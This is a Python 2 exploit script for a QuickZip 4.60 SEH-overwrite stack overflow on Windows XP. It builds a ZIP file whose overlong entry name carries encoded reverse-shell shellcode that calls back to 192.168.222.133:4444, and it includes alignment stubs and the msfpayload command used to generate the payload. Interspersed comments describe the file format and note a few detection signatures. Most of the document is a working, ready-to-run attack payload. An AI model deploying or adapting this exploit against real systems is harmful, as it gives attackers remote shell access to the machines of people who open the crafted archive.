# Exploit Title: QuickZip 4.60.0.19 SEH Overwrite Exploit using POPPOPRET from OS dll (Tested on Windows XP SP3)
# Based on https://www.offensive-security.com/vulndev/quickzip-stack-bof-a-box-of-chocolates-part-2/
# Date: 06/18/2018
#
# Python 2 script (print statement, raw_input, str-as-bytes).  It builds a
# single-entry ZIP archive whose entry *name* is a 5000-byte string and writes
# it to tiptiptipboom.zip in the current directory; no entry data is stored.
# From the defender's side the artifact is easy to characterise: a local file
# header whose filename length field is 5000 while both size fields are 0.
# Entry names of that length are a reasonable thing for a scanner or ingest
# pipeline to reject before an archive reaches a legacy extractor.
import os, struct
# msfpayload windows/shell_reverse_tcp LHOST=192.168.222.133 LPORT=4444 R | msfencode -e x86/alpha_mixed BufferRegister=ECX -t raw
# Encoded (alphanumeric) payload; the callback address/port from the command
# above are baked into it.
shellcode = "IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlJHNi7pS0uPE0nikUdqyB3TNkrr6PNksbDLLKQBuDlKsBuxTOH73zTfTqKO6QyPll5lsQCL5RFLa0YQJo6mEQYWhbjPaBCgNkSbVpNkqRwLc1xPlKqPsHouKpSD3zUQjprplKG8vxlKqHQ0eQICm3wLw9lK7Dnkc1iFea9oFQyPLl9QJo4MuQyWEhipaeYd4C1mXxgKam4dQeIrF8LKV8gTVaICe6lKdLRklKV8eLUQyCNk6dLKUQxPLIStQ4Q4Sk1K0aF9Sj2qkOypv8co3jLKDR8kk61M587CWBs0UPSXcGD3TrQOCdPhPLSG7VS7iokeLxZ0UQ7ps0diHDF40PqxVIK0BK30YoKe0PBp0PPPG0F0W060e8yz4OKoM0KOn5niIW2HyPlhYNourHwrc0B1CllIHfazTPV6SgqxnyleRT51kO9Eph3SPmQtuPNiM3Rw0Wv7uaifbJgbaIbvm2YmbF8GPDQ4gL5QGqnm3ttdvpHFs0pDbtbp1FRv3fg6QF0NbvV6ScaF2HaizlEolF9oJuK9ypBnaFRfYoFPBHs8ngWmQpiohUMkxpH5NBpVPhi6NuoMMMIoHUwLC61l7zopKK9pbU7uOK3wUC42bO0jePPSKOn5AA"
# Hand-assembled x86 byte fragments; the variable names are their only
# description on this page.
stack_align = "\x59\x59\x59\x51\x5c"
zero_eax = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
ecx_align = zero_eax + "\x2D\x5F\x25\x25\x25\x2D\x5F\x25\x25\x25\x2D\x61\x24\x25\x25\x50"
ecx_align += zero_eax + "\x2D\x29\x6A\x31\x55\x2D\x29\x6A\x31\x55\x2D\x2B\x6A\x30\x56\x50"
jmp_back = "\x72\xf1"
# Entry-name layout: 294 filler bytes, 4 more filler bytes plus a 4-byte
# literal (presumably the handler address the title refers to), the three
# stubs above padded with "D" to exactly 100 bytes, the payload, then "E"
# filler so the whole name is exactly 5000 bytes.  The "D" padding is
# 100 - 59 = 41 bytes today; if the stubs ever grew past 100 bytes the
# multiplier would go negative, "D" * negative is "", and the 5000-byte total
# would silently stop holding.
filename = "B" * 294 + "BBBB\x65\x47\x7e\x6d" + stack_align + ecx_align + jmp_back + "D" * (100 - len(stack_align) - len(ecx_align) - len(jmp_back)) + shellcode + "E" * (5000 - 294 - 8 - 100 - len(shellcode))
# =======================================================================================================
lfheader = "\x50\x4b\x03\x04" # local file header signature
lfheader += "\x14\x00" # version needed to extract
lfheader += "\x00\x00" # general purpose bit flag
lfheader += "\x00\x00" # compression method
lfheader += "\xb7\xac" # file last modtime
lfheader += "\xce\x34" # file last moddate
lfheader += "\x00\x00\x00\x00" # crc32
lfheader += "\x00\x00\x00\x00" # compressed size
lfheader += "\x00\x00\x00\x00" # uncompressed size
# '<h' is a signed 16-bit field: 5000 fits, a name longer than 32767 bytes
# would raise struct.error here.
lfheader += struct.pack('<h', int(len(filename))) # file name length
lfheader += "\x00\x00" # extra field length
cdfheader = "\x50\x4B\x01\x02" # central directory file header signature
cdfheader += "\x14\x00" # version made by
cdfheader += "\x14\x00" # version needed to extract
cdfheader += "\x00\x00" # general purpose bit flag
cdfheader += "\x00\x00" # compression method
cdfheader += "\xB7\xAC" # file last modtime
cdfheader += "\xCE\x34" # file last moddate
cdfheader += "\x00\x00\x00\x00" # crc32
cdfheader += "\x00\x00\x00\x00" # compressed size
cdfheader += "\x00\x00\x00\x00" # uncompressed size
cdfheader += struct.pack('<h', int(len(filename))) # file name length
cdfheader += "\x00\x00" # extra field length
cdfheader += "\x00\x00" # file comment length
cdfheader += "\x00\x00" # disk number where file starts
cdfheader += "\x01\x00" # internal file attributes
cdfheader += "\x24\x00\x00\x00" # external file attributes
cdfheader += "\x00\x00\x00\x00" # relative offset of local file header
eocd = "\x50\x4B\x05\x06" # end of central directory signature
eocd += "\x00\x00" # number of this disk
eocd += "\x00\x00" # disk where central directory starts
eocd += "\x01\x00" # number of central directory records on this disk
eocd += "\x01\x00" # total number of central directory records
# Both values are derived from the real header/name lengths, so the EOCD
# record stays consistent with the rest of the archive if the name changes.
eocd += struct.pack('<L', int(len(cdfheader + filename))) # size of central directory (bytes)
eocd += struct.pack('<L', int(len(lfheader + filename))) # offset of start of central directory, relative to start of archive
eocd += "\x00\x00" # comment length
# =======================================================================================================
print "Size = " + str(len(filename))
print "lfheader_length = " + str(len(lfheader))
print "cdfheader_length = " + str(len(cdfheader))
print "eocd_length = " + str(len(eocd))
# Windows cmd.exe "del" through the shell; the return code is ignored, so a
# missing file (or a non-Windows host) only prints a shell error and the
# script carries on.  os.remove would do the same job without a shell.
os.system("del tiptiptipboom.zip")
# Archive layout: [local header][name][central directory entry][name][EOCD]
# with no entry data in between, matching the zero size fields above.
buf = lfheader + filename + cdfheader + filename + eocd
# Opened in text mode; on Windows that translates "\n" to "\r\n".  None of the
# bytes assembled above is 0x0a, so this happens to be harmless here, but "wb"
# is the correct mode for binary output.
fh = open("tiptiptipboom.zip", "w")
fh.write(buf)
fh.close()
raw_input('Press Enter to exit')